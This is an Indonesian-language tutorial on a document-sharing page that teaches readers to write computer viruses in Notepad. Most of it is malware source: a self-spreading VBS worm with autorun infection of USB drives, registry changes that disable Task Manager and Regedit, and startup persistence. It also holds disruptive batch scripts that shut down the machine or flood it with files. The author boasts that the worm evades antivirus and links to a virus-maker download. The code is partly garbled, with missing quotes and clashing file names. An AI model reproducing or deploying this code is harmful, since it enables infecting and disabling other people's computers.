Upload
khumairaalkarimah
View
5
Download
0
Embed Size (px)
DESCRIPTION
yaya
Citation preview
Beberapa Cara Membuat Virus Sederhana Dengan Notepad versi Script VBS dan Bat
Beberapa Cara Membuat Virus Sederhana Dengan Notepad versi Script VBS dan Bat
karena di Windows sudah ada compiler yangterintegrasi dengannya, Windows Based Script Host.
sesua janji saya, kita akan membuat virus yang sederhanamenggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable discdengan AutoRun sehingga komputer lain yang tercolok flash disc atau CDterinfeksi akan langsung menjadi korban tanpa menungu User menjalankaninfector-nya.
Buka notepad, Lalu Copy Paste Code Script di Bawah ini Yaw. dan simpan denganekstensi bat (klo yang disuruh bat) atau ekstensi vbs (Klo yang disuruh vbs),misalnya virus.bat/virus.vbs
PEMBUATAN VIRUS DENGAN EKSTENSI .VBS======================================================================================
//-BosgentongsITS-////-INI VIRUS BERBAHAYA JANGAN DIBUAT MAIN-MAIN!!!!!!!-//
//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudianlanjutkan kegiatan virus-//
on error resume next
//-Dim kata-kata berikut ini-//
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
//-Set sebuah teks yang nantinya akan dibuat untukAutorun Setup Information-//atr = [autorun]&vbcrlf&shellexecute=wscript.exe bosgentongs.exe.vbs
set fs = createobject(Scripting.FileSystemObject)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
//-Copy diri untuk menjadi file induk di Windows Path(example: C:\Windows)-//Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & \bosgentongs.exe.vbs)
tf.attributes = 32
set tf=fs.createtextfile(winpath & \bosgentongs.exe.vbs,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & \bosgentongs.exe.vbs)
tf.attributes = 39
//-Buat Atorun.inf untuk menjalankan virus otomatissetiap flash disc tercolok-////-Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket-//
for each flashdrive in fs.drives
//-Cek Drive-//If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.pathA: then
//-Buat Infector jika ternyata Drivetypr 1 atau 2. AtauA:\-//set tf=fs.getfile(flashdrive.path &\bosgentongs.exe.vbs)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &\bosgentongs.exe.vbs,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &\erwinda_putra.exe.vbs)
tf.attributes =39
//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan(Auto Setup Information)-//set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes=39
end if
next
//-Manipulasi Registry-//set rg = createobject(WScript.Shell)
//-Manip Ubah Title Internet Explorer menjadiBOSGENTONGS v.s. ANTIVIRUS-//rg.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowTitle, THE BOSGENTONGS v.s. ANTIVIRUS
//-Manip Set agar file hidden tidak ditampilkan diExplorer-//
rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden,0, REG_DWORD
//-Manip Hilangkan menu Find, Folder Options, Run, danmemblokir Regedit dan Task Manager-//rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind,1, REG_DWORD
rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions,1, REG_DWORD
rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun,1, REG_DWORD
rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools,1, REG_DWORD
rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr,1, REG_DWORD
//-Manip Disable klik kanan-//rg.RegWriteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu,1, REG_DWORD
//-Manip Munculkan Pesan Setiap Windows Startup-//rg.regwriteHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption,Worm Kalong. Variant from Bosgentongs, dont panic all data are safe.
rg.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon /v LegalNoticeText /d AKU TELAH MENGUASAI YOURSISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI
//-Manip Aktif setiap Windows Startup-//rg.regwriteHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir,winpath & \batch- bosgentongs.exe.vbs
//-Manip Ubah RegisteredOwner dan Organization-//rg.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOrganization, The Bosgentongs
rg.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOwner,bosgentongs
//-Manip Membuat Cadangan di sistem svchost, MS32Dlldan membuat ikon-//rg.regwriteHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost,winpath&\bosgentongs.exe.vbs
rg.regwriteHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL,"
rg.regwrite HKCR\vbsfile\DefaultIcon\,shell32.dll,3
//-Manip Me-Log off komputer setelah log on BOLEHDIHAPUS KLO MAU LIHAT EFEKNYA!!!-//rg.regwriteHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Logoff,winpath & \System32\Logoff.exe
//-Fungsi di untuk mengaktifkan kembali script danmengulangnya kembali-//
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(Wscript.shell)
sd.run winpath&\explorer.exe /e,/select, &Wscript.ScriptFullname
do while year(now) >= 2009
WScript.sleep 20000
//-Memunculkan pesan window terus menerus-//
msgbox Selamatlah virus ini tiba di sistem ente & vbcrlf & _
kulo nyuwun pangapuranipun menawi sampung mengganggu ente sekalian & vbcrlf &_
jangan kawatir dan sedih, aku tidak akan kuasai komputer bobrok ini. kini entesudah masuk dalam permainanku & vbcrlf & _
ini hanya permainnaku yang aku kesepian di sini & vbcrlf & _
vbcrlf & vbcrlf & _
elok-elok indah kehidupan bukan kenyataan & vbcrlf & vbcrlf & _
saatnya kini aku bangkit dalam mimpi ituk
//-Mengulang kode script-//loop
//Akhir dari Kode & simpan dengan namabosgentongs.exe.vbs-// ==========================================================================================
PEMBUATAN VIRUS DENGAN EKSTENSI .BAT==========================================================================================
cd C:\mkdir\Alert\Warning\Dangers\A NAMAKU ALBERT ANAK IDEAL SEKALI SEDANG SEDIHMENCARI TEMAN\Makan
cd C:\Windows\
mkdir\Alert\Warning\Dangers\A NAMAKU ALBERT ANAK IDEAL SEKALI SEDANG SEDIHMENCARI TEMAN\Makan
cd C:\Windows\System32\
mkdir\Alert\Warning\Dangers\A NAMAKU ALBERT ANAK IDEAL SEKALI SEDANG SEDIHMENCARI TEMAN\Makan
cd D:\
mkdir\Alert\Warning\Dangers\A NAMAKU ALBERT ANAK IDEAL SEKALI SEDANG SEDIHMENCARI TEMAN\Makan
@echo off
copy bosgentongsvirus.bmp %systemdrive%\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\system32\ /y
copy bosgentongsvirus.exe %systemdrive%\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\system32\ /y
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon /v LegalNoticeCaption /d WARNING MESSAGE FROMBOSGENTONGS /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon /v LegalNoticeText /d AKU TELAH MENGUASAI YOURSISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /vbosgentongsvirus /d %systemdrive%\windows\system32\bosgentongsvirus.exe /f
reg add HKEY_CURRENT_USER\Control Panel\Desktop /v Wallpaper /d%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
reg add HKEY_CURRENT_USER\Control Panel\Desktop /v WallpaperStyle /d 0 /f
reg add HKEY_CURRENT_USER\Control Panel\Colors /v window /d #C10000 /f
reg add HKEY_USERS\.DEFAULT\Control Panel\Desktop /v Wallpaper /d%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo -
echo ============= BOSGENTONGS love HACKER ==============
echo ============= bosgentongs inc. Team ==============
echo ============= Kediri, 16 Juli 2009 ==============
echo -
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo
echo AWAS JANGAN PENCET TOMBOL APAPUN!echo Atau memori anda akan penuhecho
echo Mendeteksi apabila tombol keyboard dipencet .Pause>null
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.httecho>>Yes.txt
cls
goto bgvirus
//-Simpan dengan ekstensi *.bat-//
=========================================================================================
Atau Virus Bat yang ini.
=========================================================================================
@echo offC:
cls
Echo Do you want to kill all programs? (Y/N)pause >nul
cls
Echo Are you sure want to delete all data? (Y/N)pause >nul
cls
Echo Deleting All Dataping localhost -n 2 >nul
cls
Echo Deleting All Data.ping localhost -n 2 >nul
cls
Echo Deleting All Data..ping localhost -n 2 >nul
cls
Echo Deleting All Datacls
Echo Deleting All Data.ping localhost -n 2 >nul
cls
Echo Deleting All Data.ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Dataping localhost -n 2 >nul
cls
Echo Deleting All Data.ping localhost -n 2 >nul
cls
Echo System Error
Echo System cant open windows Folder
Echo Warning! Sistem shutting downping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 25 -c This is a virus. You have beenHakced By Bosgentongs. Thank you for your attention
:hack
echo You have just been hackedgoto hack
//- simpan dengan ekstensi*.bat-//==========================================================================================
KETERANGAN
Warna Merah artinyaTidak Usah Ditulis Karena hanya Sebagai Petunjuk SajaWarna Biru ArtinyaTulisan ini Bisa Diganti Degan Tulisan Sembarang Terserah Kamu
Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf fileuntukmenjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuahdrive. Untuk membuat auturun buka notepad copy-paste code di bawah dan simpandengan file name: Autorun.inf dengan save as type: All files SayaBeri kode autorun.inf Bila Belum Tau: NB: Warna biruadalah nama file virus+ekstensinya yang kamu buat tadi
======================================================================
[Autorun]
UseAutoplay=1
Icon=%SystemRoot%\system32\SHELL32.dll,7
Shellexecute=wscript.exe bosgentongs.exe.vbsShell\OPEN\COMMAND=wscript.exe bosgentongs.exe.vbsShell\explore\COMMAND=wscript.exe bosgentongs.exe.vbs
Action=Open folder to view files
=====================================================================
NB: file-file tersebut harus dalam 1 direktori, lalu seleksifile-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY.Copy file-file tersebut ke CD atau FlashDisk dalam Folder Utama Yaw
Truz Nikmatin Dech Efeknya.
Virus Worm ini memang bukan murni dari pemikiran saya sendirikarena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidakterdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahukalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad(dari Windows Original) juga bisa.
Kalau ini masih dirasa sulit buat teman-teman ada satu lagicara yaitu dengan virus maker hanya dengan memberikan tanda chek kemudian klikok,sudah jadi, bisa didownload disini:
http://rs126.rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip